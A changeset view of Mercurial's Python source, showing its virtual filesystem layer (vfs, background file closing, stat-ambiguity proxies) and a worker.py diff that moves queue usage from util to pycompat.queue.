        The vfs base is not injected so that paths stay relative. This exists
        to allow handling of strange encoding if needed."""
        return os.path.join(*paths)

    def split(self, path):
        """split top-most element of a path (as os.path.split would do)

        This exists to allow handling of strange encoding if needed."""
        return os.path.split(path)

    def lexists(self, path=None):
        return os.path.lexists(self.join(path))

    def lstat(self, path=None):
        return os.lstat(self.join(path))

    def listdir(self, path=None):
        return os.listdir(self.join(path))

    def makedir(self, path=None, notindexed=True):
        return util.makedir(self.join(path), notindexed)

    def makedirs(self, path=None, mode=None):
        return util.makedirs(self.join(path), mode)

    def makelock(self, info, path):
        return util.makelock(info, self.join(path))

    def mkdir(self, path=None):
        return os.mkdir(self.join(path))

    def mkstemp(self, suffix='', prefix='tmp', dir=None):
        fd, name = tempfile.mkstemp(suffix=suffix, prefix=prefix,
                                    dir=self.join(dir))
        dname, fname = util.split(name)
        if dir:
            return fd, os.path.join(dir, fname)
        else:
            return fd, fname

    def readdir(self, path=None, stat=None, skip=None):
        return util.listdir(self.join(path), stat, skip)

    def readlock(self, path):
        return util.readlock(self.join(path))

    def rename(self, src, dst, checkambig=False):
        """Rename from src to dst

        checkambig argument is used with util.filestat, and is useful
        only if destination file is guarded by any lock
        (e.g. repo.lock or repo.wlock).

        To avoid file stat ambiguity forcibly, checkambig=True involves
        copying ``src`` file, if it is owned by another. Therefore, use
        checkambig=True only in limited cases (see also issue5418 and
        issue5584 for detail).
        """
        srcpath = self.join(src)
        dstpath = self.join(dst)
        oldstat = checkambig and util.filestat.frompath(dstpath)
        if oldstat and oldstat.stat:
            ret = util.rename(srcpath, dstpath)
            _avoidambig(dstpath, oldstat)
            return ret
        return util.rename(srcpath, dstpath)

    def readlink(self, path):
        return os.readlink(self.join(path))

    def removedirs(self, path=None):
        """Remove a leaf directory and all empty intermediate ones
        """
        return util.removedirs(self.join(path))

    def rmtree(self, path=None, ignore_errors=False, forcibly=False):
        """Remove a directory tree recursively

        If ``forcibly``, this tries to remove READ-ONLY files, too.
        """
        if forcibly:
            def onerror(function, path, excinfo):
                if function is not os.remove:
                    raise
                # read-only files cannot be unlinked under Windows
                s = os.stat(path)
                if (s.st_mode & stat.S_IWRITE) != 0:
                    raise
                os.chmod(path, stat.S_IMODE(s.st_mode) | stat.S_IWRITE)
                os.remove(path)
        else:
            onerror = None
        return shutil.rmtree(self.join(path),
                             ignore_errors=ignore_errors, onerror=onerror)

    def setflags(self, path, l, x):
        return util.setflags(self.join(path), l, x)

    def stat(self, path=None):
        return os.stat(self.join(path))

    def unlink(self, path=None):
        return util.unlink(self.join(path))

    def tryunlink(self, path=None):
        """Attempt to remove a file, ignoring missing file errors."""
        util.tryunlink(self.join(path))

    def unlinkpath(self, path=None, ignoremissing=False):
        return util.unlinkpath(self.join(path), ignoremissing=ignoremissing)

    def utime(self, path=None, t=None):
        return os.utime(self.join(path), t)

    def walk(self, path=None, onerror=None):
        """Yield a (dirpath, dirs, files) tuple for each directory under path

        ``dirpath`` is relative to the root of this vfs. It uses
        ``os.sep`` as the path separator, even if you specify a POSIX
        style ``path``.

        "The root of this vfs" is represented as empty ``dirpath``.
        """
        root = os.path.normpath(self.join(None))
        # when dirpath == root, dirpath[prefixlen:] becomes empty
        # because len(dirpath) < prefixlen.
        prefixlen = len(pathutil.normasprefix(root))
        for dirpath, dirs, files in os.walk(self.join(path), onerror=onerror):
            yield (dirpath[prefixlen:], dirs, files)

    @contextlib.contextmanager
    def backgroundclosing(self, ui, expectedcount=-1):
        """Allow files to be closed asynchronously.

        When this context manager is active, ``backgroundclose`` can be passed
        to ``__call__``/``open`` to result in the file possibly being closed
        asynchronously, on a background thread.
        """
        # Sharing backgroundfilecloser between threads is complex and using
        # multiple instances puts us at risk of running out of file
        # descriptors; only allow use of backgroundfilecloser when in the
        # main thread.
        if not isinstance(threading.currentThread(), threading._MainThread):
            yield
            return
        vfs = getattr(self, 'vfs', self)
        if getattr(vfs, '_backgroundfilecloser', None):
            raise error.Abort(
                _('can only have 1 active background file closer'))

        with backgroundfilecloser(ui, expectedcount=expectedcount) as bfc:
            try:
                vfs._backgroundfilecloser = bfc
                yield bfc
            finally:
                vfs._backgroundfilecloser = None
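
    # An illustrative caller pattern (assumed from the docstring above, not a
    # verbatim upstream call site):
    #
    #     with myvfs.backgroundclosing(ui, expectedcount=len(files)):
    #         for name, data in files:
    #             myvfs.write(name, data, backgroundclose=True)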

class vfs(abstractvfs):
    '''Operate files relative to a base directory

    This class is used to hide the details of COW semantics and
    remote file access from higher level code.

    'cacheaudited' should be enabled only if (a) vfs object is short-lived, or
    (b) the base directory is managed by hg and considered sort-of append-only.
    See pathutil.pathauditor() for details.
    '''
    def __init__(self, base, audit=True, cacheaudited=False, expandpath=False,
                 realpath=False):
        if expandpath:
            base = util.expandpath(base)
        if realpath:
            base = os.path.realpath(base)
        self.base = base
        self._audit = audit
        if audit:
            self.audit = pathutil.pathauditor(self.base, cached=cacheaudited)
        else:
            self.audit = (lambda path, mode=None: True)
        self.createmode = None
        self._trustnlink = None

    @util.propertycache
    def _cansymlink(self):
        return util.checklink(self.base)

    @util.propertycache
    def _chmod(self):
        return util.checkexec(self.base)

    def _fixfilemode(self, name):
        if self.createmode is None or not self._chmod:
            return
        os.chmod(name, self.createmode & 0o666)

    def __call__(self, path, mode="r", atomictemp=False, notindexed=False,
                 backgroundclose=False, checkambig=False, auditpath=True):
        '''Open ``path`` file, which is relative to vfs root.

        Newly created directories are marked as "not to be indexed by
        the content indexing service", if ``notindexed`` is specified
        for "write" mode access.

        If ``backgroundclose`` is passed, the file may be closed asynchronously.
        It can only be used if the ``self.backgroundclosing()`` context manager
        is active. This should only be specified if the following criteria hold:

        1. There is a potential for writing thousands of files. Unless you
           are writing thousands of files, the performance benefits of
           asynchronously closing files are not realized.
        2. Files are opened exactly once for the ``backgroundclosing``
           active duration and are therefore free of race conditions between
           closing a file on a background thread and reopening it. (If the
           file were opened multiple times, there could be unflushed data
           because the original file handle hasn't been flushed/closed yet.)

        The ``checkambig`` argument is passed to atomictempfile (valid
        only for writing), and is useful only if the target file is
        guarded by any lock (e.g. repo.lock or repo.wlock).

        To avoid file stat ambiguity forcibly, checkambig=True involves
        copying ``path`` file opened in "append" mode (e.g. for
        truncation), if it is owned by another. Therefore, use the
        combination of append mode and checkambig=True only in limited
        cases (see also issue5418 and issue5584 for detail).
        '''
        if auditpath:
            if self._audit:
                r = util.checkosfilename(path)
                if r:
                    raise error.Abort("%s: %r" % (r, path))
            self.audit(path, mode=mode)
        f = self.join(path)

        if "b" not in mode:
            mode += "b" # for that other OS

        nlink = -1
        if mode not in ('r', 'rb'):
            dirname, basename = util.split(f)
            # If basename is empty, then the path is malformed because it points
            # to a directory. Let the posixfile() call below raise IOError.
            if basename:
                if atomictemp:
                    util.makedirs(dirname, self.createmode, notindexed)
                    return util.atomictempfile(f, mode, self.createmode,
                                               checkambig=checkambig)
                try:
                    if 'w' in mode:
                        util.unlink(f)
                        nlink = 0
                    else:
                        # nlinks() may behave differently for files on Windows
                        # shares if the file is open.
                        with util.posixfile(f):
                            nlink = util.nlinks(f)
                            if nlink < 1:
                                nlink = 2 # force mktempcopy (issue1922)
                except (OSError, IOError) as e:
                    if e.errno != errno.ENOENT:
                        raise
                    nlink = 0
                    util.makedirs(dirname, self.createmode, notindexed)
                if nlink > 0:
                    if self._trustnlink is None:
                        self._trustnlink = nlink > 1 or util.checknlink(f)
                    if nlink > 1 or not self._trustnlink:
                        util.rename(util.mktempcopy(f), f)
        fp = util.posixfile(f, mode)
        if nlink == 0:
            self._fixfilemode(f)

        if checkambig:
            if mode in ('r', 'rb'):
                raise error.Abort(_('implementation error: mode %s is not'
                                    ' valid for checkambig=True') % mode)
            fp = checkambigatclosing(fp)

        if (backgroundclose and
                isinstance(threading.currentThread(), threading._MainThread)):
            if not self._backgroundfilecloser:
                raise error.Abort(_('backgroundclose can only be used when a '
                                    'backgroundclosing context manager is active')
                                  )

            fp = delayclosedfile(fp, self._backgroundfilecloser)

        return fp
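
    # Illustrative uses of the write-path options above (hypothetical call
    # sites): atomictemp writes through a temporary file that is renamed
    # into place on close, so readers never observe a partial file, while
    # checkambig guards lock-protected files against stat ambiguity:
    #
    #     with myvfs('state', 'wb', atomictemp=True) as fp:
    #         fp.write(data)
    #     fp = myvfs('journal', 'ab', checkambig=True)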

    def symlink(self, src, dst):
        self.audit(dst)
        linkname = self.join(dst)
        util.tryunlink(linkname)

        util.makedirs(os.path.dirname(linkname), self.createmode)

        if self._cansymlink:
            try:
                os.symlink(src, linkname)
            except OSError as err:
                raise OSError(err.errno, _('could not symlink to %r: %s') %
                              (src, encoding.strtolocal(err.strerror)),
                              linkname)
        else:
            self.write(dst, src)

    def join(self, path, *insidef):
        if path:
            return os.path.join(self.base, path, *insidef)
        else:
            return self.base

opener = vfs

class proxyvfs(object):
    def __init__(self, vfs):
        self.vfs = vfs

    @property
    def options(self):
        return self.vfs.options

    @options.setter
    def options(self, value):
        self.vfs.options = value

class filtervfs(abstractvfs, proxyvfs):
    '''Wrapper vfs for filtering filenames with a function.'''

    def __init__(self, vfs, filter):
        proxyvfs.__init__(self, vfs)
        self._filter = filter

    def __call__(self, path, *args, **kwargs):
        return self.vfs(self._filter(path), *args, **kwargs)

    def join(self, path, *insidef):
        if path:
            return self.vfs.join(self._filter(self.vfs.reljoin(path, *insidef)))
        else:
            return self.vfs.join(path)

filteropener = filtervfs
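
# For example (illustrative): a filtervfs can transparently rewrite names
# before delegating to the wrapped vfs:
#
#     lowervfs = filtervfs(myvfs, lambda p: p.lower())
#     lowervfs('FOO', 'rb')   # opens 'foo' through the wrapped vfs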

class readonlyvfs(abstractvfs, proxyvfs):
    '''Wrapper vfs preventing any writing.'''

    def __init__(self, vfs):
        proxyvfs.__init__(self, vfs)

    def __call__(self, path, mode='r', *args, **kw):
        if mode not in ('r', 'rb'):
            raise error.Abort(_('this vfs is read only'))
        return self.vfs(path, mode, *args, **kw)

    def join(self, path, *insidef):
        return self.vfs.join(path, *insidef)

class closewrapbase(object):
    """Base class for wrappers that hook closing

    Do not instantiate outside of the vfs layer.
    """
    def __init__(self, fh):
        object.__setattr__(self, r'_origfh', fh)

    def __getattr__(self, attr):
        return getattr(self._origfh, attr)

    def __setattr__(self, attr, value):
        return setattr(self._origfh, attr, value)

    def __delattr__(self, attr):
        return delattr(self._origfh, attr)

    def __enter__(self):
        return self._origfh.__enter__()

    def __exit__(self, exc_type, exc_value, exc_tb):
        raise NotImplementedError('attempted instantiating ' + str(type(self)))

    def close(self):
        raise NotImplementedError('attempted instantiating ' + str(type(self)))
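
# Design note on closewrapbase: since __setattr__ above forwards attribute
# writes to the wrapped file object, constructors must store state on the
# proxy itself via object.__setattr__; a plain ``self._origfh = fh`` would
# trigger __getattr__('_origfh') before the attribute exists and recurse.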

class delayclosedfile(closewrapbase):
    """Proxy for a file object whose close is delayed.

    Do not instantiate outside of the vfs layer.
    """
    def __init__(self, fh, closer):
        super(delayclosedfile, self).__init__(fh)
        object.__setattr__(self, r'_closer', closer)

    def __exit__(self, exc_type, exc_value, exc_tb):
        self._closer.close(self._origfh)

    def close(self):
        self._closer.close(self._origfh)

class backgroundfilecloser(object):
    """Coordinates background closing of file handles on multiple threads."""
    def __init__(self, ui, expectedcount=-1):
        self._running = False
        self._entered = False
        self._threads = []
        self._threadexception = None

        # Only Windows/NTFS has slow file closing. So only enable by default
        # on that platform. But allow it to be enabled elsewhere for testing.
        defaultenabled = pycompat.iswindows
        enabled = ui.configbool('worker', 'backgroundclose', defaultenabled)

        if not enabled:
            return

        # There is overhead to starting and stopping the background threads.
        # Don't do background processing unless the file count is large enough
        # to justify it.
        minfilecount = ui.configint('worker', 'backgroundcloseminfilecount')
        # FUTURE dynamically start background threads after minfilecount closes.
        # (We don't currently have any callers that don't know their file count)
        if expectedcount > 0 and expectedcount < minfilecount:
            return

        maxqueue = ui.configint('worker', 'backgroundclosemaxqueue')
        threadcount = ui.configint('worker', 'backgroundclosethreadcount')

        ui.debug('starting %d threads for background file closing\n' %
                 threadcount)

        self._queue = pycompat.queue.Queue(maxsize=maxqueue)
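        # pycompat.queue re-exports the standard library queue module
        # (``Queue`` on Python 2, ``queue`` on Python 3), so Queue here and
        # Empty in _worker() below resolve under both interpreters. A minimal
        # sketch of such a shim (assumed, for illustration only):
        #
        #     try:
        #         import queue            # Python 3
        #     except ImportError:
        #         import Queue as queue   # Python 2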
572 self._running = True
572 self._running = True
573
573
574 for i in range(threadcount):
574 for i in range(threadcount):
575 t = threading.Thread(target=self._worker, name='backgroundcloser')
575 t = threading.Thread(target=self._worker, name='backgroundcloser')
576 self._threads.append(t)
576 self._threads.append(t)
577 t.start()
577 t.start()
578
578
579 def __enter__(self):
579 def __enter__(self):
580 self._entered = True
580 self._entered = True
581 return self
581 return self
582
582
583 def __exit__(self, exc_type, exc_value, exc_tb):
583 def __exit__(self, exc_type, exc_value, exc_tb):
584 self._running = False
584 self._running = False
585
585
586 # Wait for threads to finish closing so open files don't linger for
586 # Wait for threads to finish closing so open files don't linger for
587 # longer than lifetime of context manager.
587 # longer than lifetime of context manager.
588 for t in self._threads:
588 for t in self._threads:
589 t.join()
589 t.join()
590
590
591 def _worker(self):
591 def _worker(self):
592 """Main routine for worker thread."""
592 """Main routine for worker thread."""
593 while True:
593 while True:
594 try:
594 try:
595 fh = self._queue.get(block=True, timeout=0.100)
595 fh = self._queue.get(block=True, timeout=0.100)
596 # Need to catch or the thread will terminate and
596 # Need to catch or the thread will terminate and
597 # we could orphan file descriptors.
597 # we could orphan file descriptors.
598 try:
598 try:
599 fh.close()
599 fh.close()
600 except Exception as e:
600 except Exception as e:
601 # Stash so can re-raise from main thread later.
601 # Stash so can re-raise from main thread later.
602 self._threadexception = e
602 self._threadexception = e
603 except util.empty:
603 except pycompat.queue.Empty:
604 if not self._running:
604 if not self._running:
605 break
605 break
606
606
607 def close(self, fh):
607 def close(self, fh):
608 """Schedule a file for closing."""
608 """Schedule a file for closing."""
609 if not self._entered:
609 if not self._entered:
610 raise error.Abort(_('can only call close() when context manager '
610 raise error.Abort(_('can only call close() when context manager '
611 'active'))
611 'active'))
612
612
613 # If a background thread encountered an exception, raise now so we fail
613 # If a background thread encountered an exception, raise now so we fail
614 # fast. Otherwise we may potentially go on for minutes until the error
614 # fast. Otherwise we may potentially go on for minutes until the error
615 # is acted on.
615 # is acted on.
616 if self._threadexception:
616 if self._threadexception:
617 e = self._threadexception
617 e = self._threadexception
618 self._threadexception = None
618 self._threadexception = None
619 raise e
619 raise e
620
620
621 # If we're not actively running, close synchronously.
621 # If we're not actively running, close synchronously.
622 if not self._running:
622 if not self._running:
623 fh.close()
623 fh.close()
624 return
624 return
625
625
626 self._queue.put(fh, block=True, timeout=None)
626 self._queue.put(fh, block=True, timeout=None)
627
627
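# Editor's note: this hunk is the point of the changeset. util.queue and
# util.empty were individually re-exported symbols; the commit switches
# callers to the pycompat.queue module instead. The aliasing that makes
# pycompat.queue.Queue and pycompat.queue.Empty resolve on both interpreters
# is presumably along these lines (a sketch, not the actual pycompat source):

try:
    import Queue as queue    # Python 2 spells the module Queue
except ImportError:
    import queue             # Python 3 renamed it to queue

q = queue.Queue(maxsize=2)
q.put('fh')
try:
    while True:
        q.get_nowait()
except queue.Empty:          # Empty, Full, etc. come along with the module
    pass
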
class checkambigatclosing(closewrapbase):
    """Proxy for a file object, to avoid ambiguity of file stat

    See also util.filestat for details about "ambiguity of file stat".

    This proxy is useful only if the target file is guarded by a
    lock (e.g. repo.lock or repo.wlock)

    Do not instantiate outside of the vfs layer.
    """
    def __init__(self, fh):
        super(checkambigatclosing, self).__init__(fh)
        object.__setattr__(self, r'_oldstat', util.filestat.frompath(fh.name))

    def _checkambig(self):
        oldstat = self._oldstat
        if oldstat.stat:
            _avoidambig(self._origfh.name, oldstat)

    def __exit__(self, exc_type, exc_value, exc_tb):
        self._origfh.__exit__(exc_type, exc_value, exc_tb)
        self._checkambig()

    def close(self):
        self._origfh.close()
        self._checkambig()
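
# Editor's note: a self-contained illustration of the stat ambiguity the
# proxy above guards against: two writes landing in the same second with the
# same size leave (mtime, size) unchanged, so caches keyed on them go stale.
# The helper below is illustrative only; the real logic lives in
# util.filestat and _avoidambig.

import os

def closecheckingambiguity(path, oldstat):
    newstat = os.stat(path)
    ambiguous = (int(oldstat.st_mtime) == int(newstat.st_mtime)
                 and oldstat.st_size == newstat.st_size)
    if ambiguous:
        # advance mtime so (mtime, size) comparisons see a change
        os.utime(path, (newstat.st_atime, newstat.st_mtime + 1))

with open('demo.txt', 'w') as f:
    f.write('aaaa')
oldstat = os.stat('demo.txt')
with open('demo.txt', 'w') as f:
    f.write('bbbb')                  # same size, likely the same second
closecheckingambiguity('demo.txt', oldstat)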
@@ -1,327 +1,327 @@
# worker.py - master-slave parallelism support
#
# Copyright 2013 Facebook, Inc.
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.

from __future__ import absolute_import

import errno
import os
import signal
import sys
import threading
import time

from .i18n import _
from . import (
    encoding,
    error,
    pycompat,
    scmutil,
    util,
)

def countcpus():
    '''try to count the number of CPUs on the system'''

    # posix
    try:
        n = int(os.sysconf(r'SC_NPROCESSORS_ONLN'))
        if n > 0:
            return n
    except (AttributeError, ValueError):
        pass

    # windows
    try:
        n = int(encoding.environ['NUMBER_OF_PROCESSORS'])
        if n > 0:
            return n
    except (KeyError, ValueError):
        pass

    return 1

def _numworkers(ui):
    s = ui.config('worker', 'numcpus')
    if s:
        try:
            n = int(s)
            if n >= 1:
                return n
        except ValueError:
            raise error.Abort(_('number of cpus must be an integer'))
    return min(max(countcpus(), 4), 32)

if pycompat.isposix or pycompat.iswindows:
    _startupcost = 0.01
else:
    _startupcost = 1e30

def worthwhile(ui, costperop, nops):
    '''try to determine whether the benefit of multiple processes can
    outweigh the cost of starting them'''
    linear = costperop * nops
    workers = _numworkers(ui)
    benefit = linear - (_startupcost * workers + linear / workers)
    return benefit >= 0.15

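# Editor's note: concrete numbers make the threshold easier to read. All
# values below are hypothetical, not measurements:

costperop, nops, workers, startupcost = 0.01, 1000, 4, 0.01
linear = costperop * nops                    # 10.0s of serial work
benefit = linear - (startupcost * workers + linear / workers)
print(benefit >= 0.15)   # 10.0 - (0.04 + 2.5) = 7.46 -> parallelize
# With only nops = 20: 0.2 - (0.04 + 0.05) = 0.11 < 0.15 -> stay serial.
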
def worker(ui, costperarg, func, staticargs, args):
    '''run a function, possibly in parallel in multiple worker
    processes.

    returns a progress iterator

    costperarg - cost of a single task

    func - function to run

    staticargs - arguments to pass to every invocation of the function

    args - arguments to split into chunks, to pass to individual
    workers
    '''
    enabled = ui.configbool('worker', 'enabled')
    if enabled and worthwhile(ui, costperarg, len(args)):
        return _platformworker(ui, func, staticargs, args)
    return func(*staticargs + (args,))

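# Editor's note: the contract worker() expects from func is easy to miss in
# the docstring: func receives staticargs plus *one chunk* of args and yields
# (index, result) pairs. A toy function obeying that contract (the names here
# are invented for illustration):

def double(prefix, items):
    for i, n in enumerate(items):
        yield i, '%s:%d' % (prefix, n * 2)

staticargs = ('job',)
args = [1, 2, 3]
# Equivalent to worker()'s serial fallback on the last line above:
for i, item in double(*staticargs + (args,)):
    print(i, item)           # 0 job:2 / 1 job:4 / 2 job:6
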
def _posixworker(ui, func, staticargs, args):
    rfd, wfd = os.pipe()
    workers = _numworkers(ui)
    oldhandler = signal.getsignal(signal.SIGINT)
    signal.signal(signal.SIGINT, signal.SIG_IGN)
    pids, problem = set(), [0]
    def killworkers():
        # unregister SIGCHLD handler as all children will be killed. This
        # function shouldn't be interrupted by another SIGCHLD; otherwise pids
        # could be updated while iterating, which would cause inconsistency.
        signal.signal(signal.SIGCHLD, oldchldhandler)
        # if one worker bails, there's no good reason to wait for the rest
        for p in pids:
            try:
                os.kill(p, signal.SIGTERM)
            except OSError as err:
                if err.errno != errno.ESRCH:
                    raise
    def waitforworkers(blocking=True):
        for pid in pids.copy():
            p = st = 0
            while True:
                try:
                    p, st = os.waitpid(pid, (0 if blocking else os.WNOHANG))
                    break
                except OSError as e:
                    if e.errno == errno.EINTR:
                        continue
                    elif e.errno == errno.ECHILD:
                        # the child may already have been reaped, but pids not
                        # yet updated (maybe interrupted just after waitpid)
                        pids.discard(pid)
                        break
                    else:
                        raise
            if not p:
                # skip subsequent steps, because the child process should
                # still be running in this case
                continue
            pids.discard(p)
            st = _exitstatus(st)
            if st and not problem[0]:
                problem[0] = st
    def sigchldhandler(signum, frame):
        waitforworkers(blocking=False)
        if problem[0]:
            killworkers()
    oldchldhandler = signal.signal(signal.SIGCHLD, sigchldhandler)
    ui.flush()
    parentpid = os.getpid()
    for pargs in partition(args, workers):
        # make sure we use os._exit in all worker code paths. otherwise the
        # worker may do some clean-ups which could cause surprises like
        # deadlock. see sshpeer.cleanup for example.
        # override error handling *before* fork. this is necessary because
        # an exception (signal) may arrive after fork, before the "pid ="
        # assignment completes, and another exception handler (dispatch.py)
        # could lead to an unexpected code path without os._exit.
        ret = -1
        try:
            pid = os.fork()
            if pid == 0:
                signal.signal(signal.SIGINT, oldhandler)
                signal.signal(signal.SIGCHLD, oldchldhandler)

                def workerfunc():
                    os.close(rfd)
                    for i, item in func(*(staticargs + (pargs,))):
                        os.write(wfd, '%d %s\n' % (i, item))
                    return 0

                ret = scmutil.callcatch(ui, workerfunc)
        except: # parent re-raises, child never returns
            if os.getpid() == parentpid:
                raise
            exctype = sys.exc_info()[0]
            force = not issubclass(exctype, KeyboardInterrupt)
            ui.traceback(force=force)
        finally:
            if os.getpid() != parentpid:
                try:
                    ui.flush()
                except: # never returns, no re-raises
                    pass
                finally:
                    os._exit(ret & 255)
        pids.add(pid)
    os.close(wfd)
    fp = os.fdopen(rfd, r'rb', 0)
    def cleanup():
        signal.signal(signal.SIGINT, oldhandler)
        waitforworkers()
        signal.signal(signal.SIGCHLD, oldchldhandler)
        status = problem[0]
        if status:
            if status < 0:
                os.kill(os.getpid(), -status)
            sys.exit(status)
    try:
        for line in util.iterfile(fp):
            l = line.split(' ', 1)
            yield int(l[0]), l[1][:-1]
    except: # re-raises
        killworkers()
        cleanup()
        raise
    cleanup()

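# Editor's note: the parent/child framing above is one result per line; the
# child writes '%d %s\n' and the parent splits on the first space. A
# standalone round-trip of that framing (encode/decode are invented names,
# and the scheme assumes items never contain a newline):

def encode(i, item):
    return b'%d %s\n' % (i, item)

def decode(line):
    idx, rest = line.split(b' ', 1)
    return int(idx), rest[:-1]       # drop the trailing newline

assert decode(encode(3, b'path/to/file')) == (3, b'path/to/file')
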
def _posixexitstatus(code):
    '''convert a posix exit status into the same form returned by
    os.spawnv

    returns None if the process was stopped instead of exiting'''
    if os.WIFEXITED(code):
        return os.WEXITSTATUS(code)
    elif os.WIFSIGNALED(code):
        return -os.WTERMSIG(code)

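# Editor's note: a quick POSIX-only check of that decoding, inlining the same
# os.WIF* calls rather than importing Mercurial:

import os

pid = os.fork()
if pid == 0:
    os._exit(7)                      # child exits normally with code 7
waitedpid, status = os.waitpid(pid, 0)
assert os.WIFEXITED(status) and os.WEXITSTATUS(status) == 7
# A child killed by a signal instead satisfies os.WIFSIGNALED(status) and
# decodes to -os.WTERMSIG(status), e.g. -15 for SIGTERM.
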
def _windowsworker(ui, func, staticargs, args):
    class Worker(threading.Thread):
        def __init__(self, taskqueue, resultqueue, func, staticargs,
                     group=None, target=None, name=None, verbose=None):
            threading.Thread.__init__(self, group=group, target=target,
                                      name=name, verbose=verbose)
            self._taskqueue = taskqueue
            self._resultqueue = resultqueue
            self._func = func
            self._staticargs = staticargs
            self._interrupted = False
            self.daemon = True
            self.exception = None

        def interrupt(self):
            self._interrupted = True

        def run(self):
            try:
                while not self._taskqueue.empty():
                    try:
                        args = self._taskqueue.get_nowait()
                        for res in self._func(*self._staticargs + (args,)):
                            self._resultqueue.put(res)
                        # threading doesn't provide a native way to
                        # interrupt execution. handle it manually at every
                        # iteration.
                        if self._interrupted:
                            return
-                    except util.empty:
+                    except pycompat.queue.Empty:
                        break
            except Exception as e:
                # store the exception such that the main thread can resurface
                # it as if the func was running without workers.
                self.exception = e
                raise

    threads = []
    def trykillworkers():
        # Allow up to 1 second to clean up worker threads nicely
        cleanupend = time.time() + 1
        for t in threads:
            t.interrupt()
        for t in threads:
            remainingtime = cleanupend - time.time()
            t.join(remainingtime)
            if t.is_alive():
                # pass over the failure to join the workers. it is more
                # important to surface the initial exception than the
                # fact that one of the workers may be processing a large
                # task and does not get to handle the interruption.
                ui.warn(_("failed to kill worker threads while "
                          "handling an exception\n"))
                return

    workers = _numworkers(ui)
-    resultqueue = util.queue()
+    resultqueue = pycompat.queue.Queue()
-    taskqueue = util.queue()
+    taskqueue = pycompat.queue.Queue()
    # partition work into more pieces than workers to minimize the chance
    # of uneven distribution of large tasks between the workers
    for pargs in partition(args, workers * 20):
        taskqueue.put(pargs)
    for _i in range(workers):
        t = Worker(taskqueue, resultqueue, func, staticargs)
        threads.append(t)
        t.start()
    try:
        while len(threads) > 0:
            while not resultqueue.empty():
                yield resultqueue.get()
            threads[0].join(0.05)
            finishedthreads = [_t for _t in threads if not _t.is_alive()]
            for t in finishedthreads:
                if t.exception is not None:
                    raise t.exception
                threads.remove(t)
    except (Exception, KeyboardInterrupt): # re-raises
        trykillworkers()
        raise
    while not resultqueue.empty():
        yield resultqueue.get()

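# Editor's note: Worker above relies on a pattern worth calling out: Python
# threads cannot be killed, so the loop polls an interrupt flag between
# tasks. A minimal standalone version (StoppableWorker is an invented name;
# the stdlib queue module stands in for pycompat.queue):

import queue
import threading

class StoppableWorker(threading.Thread):
    def __init__(self, tasks):
        threading.Thread.__init__(self)
        self.daemon = True           # don't block interpreter exit
        self._tasks = tasks
        self._interrupted = False

    def interrupt(self):
        self._interrupted = True     # honored between tasks, never mid-task

    def run(self):
        while not self._tasks.empty():
            try:
                task = self._tasks.get_nowait()
            except queue.Empty:      # lost a race with another worker
                break
            task()
            if self._interrupted:
                return

tasks = queue.Queue()
for n in range(3):
    tasks.put(lambda n=n: print('task', n))
w = StoppableWorker(tasks)
w.start()
w.join()
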
if pycompat.iswindows:
    _platformworker = _windowsworker
else:
    _platformworker = _posixworker
    _exitstatus = _posixexitstatus

def partition(lst, nslices):
    '''partition a list into N slices of roughly equal size

    The current strategy takes every Nth element from the input. If
    we ever write workers that need to preserve grouping in input
    we should consider allowing callers to specify a partition strategy.

    mpm is not a fan of this partitioning strategy when files are involved.
    In his words:

    Single-threaded Mercurial makes a point of creating and visiting
    files in a fixed order (alphabetical). When creating files in order,
    a typical filesystem is likely to allocate them on nearby regions on
    disk. Thus, when revisiting in the same order, locality is maximized
    and various forms of OS and disk-level caching and read-ahead get a
    chance to work.

    This effect can be quite significant on spinning disks. I discovered it
    circa Mercurial v0.4 when revlogs were named by hashes of filenames.
    Tarring a repo and copying it to another disk effectively randomized
    the revlog ordering on disk by sorting the revlogs by hash and suddenly
    performance of my kernel checkout benchmark dropped by ~10x because the
    "working set" of sectors visited no longer fit in the drive's cache and
    the workload switched from streaming to random I/O.

    What we should really be doing is have workers read filenames from an
    ordered queue. This preserves locality and also keeps any worker from
    getting more than one file out of balance.
    '''
    for i in range(nslices):
        yield lst[i::nslices]
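
# Editor's note: the striding is easiest to see on a concrete input; each of
# the N slices takes every Nth element, so slice sizes differ by at most one:

lst = list(range(10))
print([lst[i::3] for i in range(3)])   # [[0, 3, 6, 9], [1, 4, 7], [2, 5, 8]]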